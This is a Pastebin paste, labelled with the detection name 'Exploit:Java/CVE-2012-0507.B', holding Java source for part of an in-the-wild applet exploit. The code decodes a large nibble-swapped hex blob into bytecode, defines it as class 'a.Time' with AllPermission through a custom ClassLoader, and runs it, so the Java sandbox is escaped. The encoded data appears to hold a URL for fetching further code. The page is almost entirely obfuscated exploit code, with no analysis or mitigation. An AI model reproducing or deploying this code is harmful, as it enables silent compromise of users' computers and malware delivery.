SHARE
TWEET

Exploit:Java/CVE-2012-0507.B

a guest Mar 27th, 2012 1,066 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Exploit:Java/CVE-2012-0507.B
  2.  
  3. package a;
  4.  
  5. import java.net.URL;
  6. import java.security.AllPermission;
  7. import java.security.CodeSource;
  8. import java.security.Permissions;
  9. import java.security.ProtectionDomain;
  10. import java.security.cert.Certificate;
  11.  
  12. class Help extends ClassLoader
  13. {
  14.   public static byte[] StringToBytes(String paramString)
  15.   {
  16.     byte[] arrayOfByte = new byte[paramString.length() / 2];
  17.  
  18.     for (int i = 0; i < paramString.length(); i += 2) {
  19.       arrayOfByte[(i / 2)] = (byte)((Character.digit(paramString.charAt(i + 1), 16) << 4) + Character.digit(paramString.charAt(i), 16));
  20.     }
  21.     return arrayOfByte;
  22.   }
  23.  
  24.   public static void doWork(Help paramHelp)
  25.   {
  26.     try {
  27.       int i = 0;
  28.       String[] arrayOfString = { "ACEFABEB0000000300A7A000520003A0001300237000", "33A000430053800063800073A0004300837000937000", "A38000B3A000C300D3A0009000E3A0009000F3A00080", "0004700014700024700034A000110003800044A00043", "0054A000110064800074A000110084A0000100E3A000", "F00094A0008000A48000B4A000C400D48000E4A000F0", "00F4A000800005A000F00005A000150025A000150035", "700045700055700065700075100060C396E69647E310", "003082926510004034F646561000F0C496E656E457D6", "265627451626C6561000302757E61000418292C4A616", "6716F2C616E676F2F426A6563647B31000A054873656", "074796F6E6371000A035F6572736566496C656100090", "4596D656E2A6166716C000720082700085C0009500A5", "100072A6166716F23756365727964797F20527966796", "C65676564614364796F6E654873656074796F6E67000", "B5C000C500D51000E086474707E2B656560716C69667", "561000506616C63756C000E500F51000B1A6166716F2", "96F6F2245766665627564694E60757473547275616D6", "1000C0A6166716F2E65647F25525C4101000", "0202020202020202020202020202020202020202020202020202020202020202", "0202020202020202020202020202020202020202020202020202020202020202", "0202020202020202020202020202020202020202020202020202020202020202", "0202020202020202020202020202020202020202020202020202020202020202", "0202020202020202020202020202020202020202020202020202020202020202", "0202020202020202020202020202020202020202020202020202020202020202", "02020202020202020202020202020202020202020202020286474707A3F2F266", "275637969696E296E6F2262345A61527C6133405B44693842373753765F44767", "700006C000160026C000720036C000460056C0007200", "661000C1A6166716F296F6F22457666656275646F457", "470757473547275616D6100081A6166716F296F6F264", "96C656F457470757473547275616D6100061A6166716", "F2C616E676F235472796E67624576666562710004045", "54D405C000760086C0009600A6100080F2D6F627E256", "8756C000B60026C0007200C6C000D600E6100050", "0303038343", "7000F6C000070017100050", "0303130363", "C000270037C000470082700057C000670077C0008700", "97100031A6166716F2C616E676F254873656074796F6", "E610006016F24596D656100001A6166716F2C616E676", "F2F426A6563647100072A6166716F237563657279647", "97F20527966796C65676564654873656074796F6E614", "364796F6E61000E1A6166716F23756365727964797F2", "14363656373734F6E64727F6C6C656271000C046F605", "27966796C6567656461000D382C4A6166716F2375636", "5727964797F20527966796C656765646548736560747", "96F6E614364796F6E6B392C4A6166716F2C616E676F2", "F426A6563647B3100001A6166716F2C616E676F23597", "374756D61000213756473556365727964797D416E616", "7656271000E182C4A6166716F2C616E676F235563657", "27964797D416E616765627B392651000B03756470527", "F6075627479710008382C4A6166716F2C616E676F235", "472796E676B3C4A6166716F2C616E676F235472796E6", "76B392C4A6166716F2C616E676F235472796E676B310", "0001A6166716F2C616E676F235472796E67610004047", "2796D61000418292C4A6166716F2C616E676F2354727", "96E676B310005182C4A6166716F2C616E676F2354727", "96E676B392651000A0F60756E63547275616D6100071", "8292C4A6166716F296F6F294E60757473547275616D6", "B310008182C4A6166716F296F6F294E6075747354727", "5616D6B3926510006076564756E66710006282C4A616", "6716F2C616E676F235472796E676B392C4A6166716F2", "C616E676F235472796E676B310006016070756E64610", "00C282C4A6166716F2C616E676F235472796E676B392", "C4A6166716F2C616E676F235472796E6762457666656", "27B310008047F635472796E6761000A182C4A6166716", "F296F6F2F457470757473547275616D6B39492651000", "402756164610007082B52494949294100011A6166716", "F2C616E676F294E64756765627100080071627375694", "E64710005182C4A6166716F2C616E676F235472796E6", "76B39294100050772796475610007082B52494949265", "10005036C6F63756100011A6166716F2C616E676F225", "57E64796D6561000A07656472557E64796D656100051", "8292C4A6166716F2C616E676F22557E64796D656B310", "00405687563610007282C4A6166716F2C616E676F235", "472796E676B392C4A6166716F2C616E676F20527F636", "563737B3001200420052001000620000002000100072", "008200100092000000E300100020000000E0A27B0010", "A28B0020757A0040C41B00100040009000C000300010", "00A2000000610050000000B0004000D0009000F000C0", "00E000D00011001000B200C200200092000010B40060", "0070000000FD108B0040114000CB80C430D330E32150", "21608B007075BB008095BB00909521A06B00B07B00C0", "6B00D07B00E0A340BB00F095BB000195BB0011957B00", "2121318B00416B005121616B00516B00717B00811140", "007B0091A3509140B2301140006B00A195D3B90094D1", "C106E33063605160C12A0013D1C1465160065007A900", "31B25160C53321B18B00C12819457A0001B25160C533", "21D18B00C12819454860107AFFFC9150B230C16B00E1", "7AFFEA91406B00F191506B00028B0012A3609160BB00", "11957B002121318B00416B005121616B00516B00716B", "0022757A0040C4100B00100040009D00CD0032001000", "A2000000250041000000410040007100A0008100E000", "A1006100B100E200C1008500D1007600F100B6000200", "47002200F7004200F8008200C90002002A00B200DA00", "D2002B00E2007B00F200CB0003009D002300DD003300", "D20000004000100032001000E20000002000F2" };
  29.       StringBuilder localStringBuilder = new StringBuilder();
  30.       for (int j = 0; j < arrayOfString.length; j++)
  31.       {
  32.         localStringBuilder.append(arrayOfString[j]);
  33.       }
  34.       byte[] arrayOfByte = StringToBytes(localStringBuilder.toString());
  35.       URL localURL = new URL("file:///");
  36.  
  37.       Certificate[] arrayOfCertificate = new Certificate[0];
  38.       Permissions localPermissions = new Permissions();
  39.       localPermissions.add(new AllPermission());
  40.       ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(localURL, arrayOfCertificate), localPermissions);
  41.  
  42.       Class localClass = paramHelp.defineClass("a.Time", arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
  43.       Time localTime = (Time)localClass.newInstance();
  44.     }
  45.     catch (Exception localException)
  46.     {
  47.     }
  48.   }
  49. }
RAW Paste Data
Top